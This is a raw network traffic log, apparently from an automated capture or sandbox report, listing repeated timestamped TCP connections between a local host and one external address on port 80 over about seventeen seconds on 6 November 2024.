                                                                                                                                                              Nov 6, 2024 17:36:54.664730072 CET4994180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:54.852544069 CET8049941150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:54.852667093 CET8049940150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:54.852725983 CET4994180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:54.852813959 CET4994080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:54.852863073 CET4994180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:54.852863073 CET4994180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.041100025 CET8049941150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.041111946 CET8049941150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.109256983 CET8049941150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.120789051 CET4994180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.121217012 CET4994280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.328769922 CET8049942150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.328818083 CET8049941150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.329037905 CET4994280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.329083920 CET4994180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.329165936 CET4994280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.329165936 CET4994280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.525358915 CET8049942150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.525407076 CET8049942150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.585098982 CET8049942150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.598247051 CET4994280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.598848104 CET4994380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.793399096 CET8049942150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.793443918 CET8049943150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.793672085 CET4994280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.793672085 CET4994380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.793853998 CET4994380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.793853998 CET4994380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:55.993386030 CET8049943150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:55.993427992 CET8049943150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.051285028 CET8049943150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.069535017 CET4994380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.070189953 CET4994480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.268542051 CET8049943150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.268549919 CET8049944150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.268739939 CET4994380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.268776894 CET4994480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.268944025 CET4994480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.268944025 CET4994480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.469964027 CET8049944150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.469974041 CET8049944150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.623179913 CET8049944150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.639446020 CET4994480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.640141010 CET4994580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.834604979 CET8049944150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.834670067 CET8049945150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:56.834768057 CET4994480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.834902048 CET4994580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.835042000 CET4994580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:56.835042000 CET4994580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:57.033771038 CET8049945150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:57.033807993 CET8049945150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:57.409399986 CET8049945150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:57.419971943 CET4994580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:57.420496941 CET4994680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:57.620703936 CET8049945150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:57.620717049 CET8049946150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:57.620965958 CET4994580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:57.620986938 CET4994680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:57.621121883 CET4994680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:57.621121883 CET4994680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:57.816400051 CET8049946150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:57.816437960 CET8049946150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:58.904433966 CET8049946150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:58.915638924 CET4994680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:58.916099072 CET4994780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.103636980 CET8049947150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.103682995 CET8049946150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.103846073 CET4994680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.103971004 CET4994780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.104042053 CET4994780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.104042053 CET4994780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.291883945 CET8049947150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.291893959 CET8049947150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.364712000 CET8049947150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.380527973 CET4994780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.381097078 CET4994880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.583028078 CET8049947150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.583036900 CET8049948150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.583199024 CET4994880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.583226919 CET4994780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.583358049 CET4994880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.583358049 CET4994880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.774441004 CET8049948150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.774454117 CET8049948150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.841304064 CET8049948150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:59.859998941 CET4994880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:59.860749960 CET4994980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.049973965 CET8049948150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:00.050035954 CET8049949150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:00.050250053 CET4994880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.050250053 CET4994980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.050431967 CET4994980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.050431967 CET4994980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.243932009 CET8049949150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:00.243942976 CET8049949150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:00.309787035 CET8049949150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:00.323539972 CET4994980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.324332952 CET4995080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.513694048 CET8049949150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:00.513922930 CET4994980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.514771938 CET8049950150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:00.515022993 CET4995080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.515230894 CET4995080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.515230894 CET4995080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:00.703140020 CET8049950150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:00.703150034 CET8049950150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:01.772262096 CET8049950150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:01.785360098 CET4995080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:01.785855055 CET4995180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:01.975189924 CET8049950150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:01.975203037 CET8049951150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:01.975393057 CET4995080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:01.975393057 CET4995180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:01.975562096 CET4995180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:01.975562096 CET4995180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.163676023 CET8049951150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.163686037 CET8049951150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.235845089 CET8049951150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.252696037 CET4995180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.253448963 CET4995280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.441025019 CET8049952150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.441032887 CET8049951150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.441221952 CET4995280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.441251993 CET4995180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.441359043 CET4995280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.441374063 CET4995280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.628978014 CET8049952150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.629102945 CET8049952150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.700444937 CET8049952150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.713485003 CET4995280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.713913918 CET4995380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.901448965 CET8049952150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.901582956 CET4995280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.902311087 CET8049953150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:02.902514935 CET4995380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.902682066 CET4995380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:02.902682066 CET4995380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:03.090778112 CET8049953150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:03.090831995 CET8049953150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.176306009 CET8049953150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.191903114 CET4995380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.192337990 CET4995480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.379839897 CET8049954150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.380132914 CET4995480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.380184889 CET8049953150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.380223036 CET4995480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.380223036 CET4995480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.380323887 CET4995380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.567708015 CET8049954150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.567718983 CET8049954150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.639370918 CET8049954150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.655224085 CET4995480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.655822039 CET4995580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.843096972 CET8049954150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.843342066 CET4995480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.843683004 CET8049955150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:04.843909025 CET4995580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.844017029 CET4995580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:04.844017029 CET4995580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.032095909 CET8049955150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.032140970 CET8049955150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.101545095 CET8049955150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.113276958 CET4995580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.113677979 CET4995680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.304276943 CET8049955150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.304287910 CET8049956150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.304562092 CET4995580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.304588079 CET4995680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.304682970 CET4995680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.304682970 CET4995680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.492862940 CET8049956150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.492872953 CET8049956150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.560134888 CET8049956150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.573157072 CET4995680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.573596954 CET4995780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.761187077 CET8049957150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.761198044 CET8049956150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.761595011 CET4995680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.761595011 CET4995780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.761746883 CET4995780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.761746883 CET4995780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:05.949440002 CET8049957150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:05.949449062 CET8049957150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.020633936 CET8049957150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.034876108 CET4995780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.035274982 CET4995880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.222718954 CET8049957150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.223031044 CET4995780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.223217010 CET8049958150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.223378897 CET4995880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.223486900 CET4995880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.223486900 CET4995880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.411448002 CET8049958150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.411699057 CET8049958150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.483473063 CET8049958150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.496948004 CET4995880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.497462034 CET4995980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.685471058 CET8049958150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.685482979 CET8049959150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.685900927 CET4995880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.685900927 CET4995980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.685900927 CET4995980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.685900927 CET4995980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.874449968 CET8049959150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.874509096 CET8049959150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.941224098 CET8049959150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:06.953974962 CET4995980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:06.954525948 CET4996080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:07.142611980 CET8049960150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:07.142623901 CET8049959150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:07.142868996 CET4995980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:07.142920017 CET4996080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:07.142985106 CET4996080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:07.142985106 CET4996080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:07.330296040 CET8049960150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:07.330319881 CET8049960150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:08.417126894 CET8049960150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:08.433062077 CET4996080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:08.433743954 CET4996180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:08.621262074 CET8049960150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:08.621393919 CET4996080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:08.621752977 CET8049961150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:08.621948957 CET4996180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:08.622086048 CET4996180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:08.622086048 CET4996180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:08.810301065 CET8049961150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:08.810347080 CET8049961150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:08.878283024 CET8049961150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:08.893218994 CET4996180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:08.894422054 CET4996280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.081572056 CET8049961150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.081801891 CET4996180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.083089113 CET8049962150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.083302975 CET4996280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.083430052 CET4996280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.083430052 CET4996280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.271408081 CET8049962150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.271748066 CET8049962150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.339981079 CET8049962150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.352452040 CET4996280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.353419065 CET4996380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.541234970 CET8049962150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.541574001 CET4996280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.541681051 CET8049963150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.542081118 CET4996380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.542081118 CET4996380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.542081118 CET4996380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.730278969 CET8049963150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.730289936 CET8049963150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.798820019 CET8049963150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.810312986 CET4996380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.810832977 CET4996480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.998513937 CET8049963150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.998611927 CET8049964150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:09.998668909 CET4996380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.998778105 CET4996480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.998924971 CET4996480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:09.998925924 CET4996480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.186836958 CET8049964150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.186847925 CET8049964150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.254863024 CET8049964150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.267072916 CET4996480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.267452955 CET4996580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.456175089 CET8049965150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.456420898 CET8049964150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.456510067 CET4996580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.456583023 CET4996480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.456583023 CET4996580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.456599951 CET4996580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.644262075 CET8049965150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.644372940 CET8049965150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.716156006 CET8049965150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.737479925 CET4996580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.738079071 CET4996680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.926578045 CET8049965150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.926589012 CET8049966150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:10.926875114 CET4996680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.926875114 CET4996580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.927048922 CET4996680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:10.927221060 CET4996680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.114993095 CET8049966150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.115003109 CET8049966150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.183875084 CET8049966150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.205698013 CET4996680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.207065105 CET4996780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.394342899 CET8049966150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.394536018 CET4996680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.395378113 CET8049967150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.395678043 CET4996780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.395829916 CET4996780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.395829916 CET4996780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.583946943 CET8049967150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.583967924 CET8049967150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.650974989 CET8049967150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.662120104 CET4996780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.662626028 CET4996880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.850240946 CET8049967150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:11.850347042 CET8049968150.241.91.218192.168.11.20
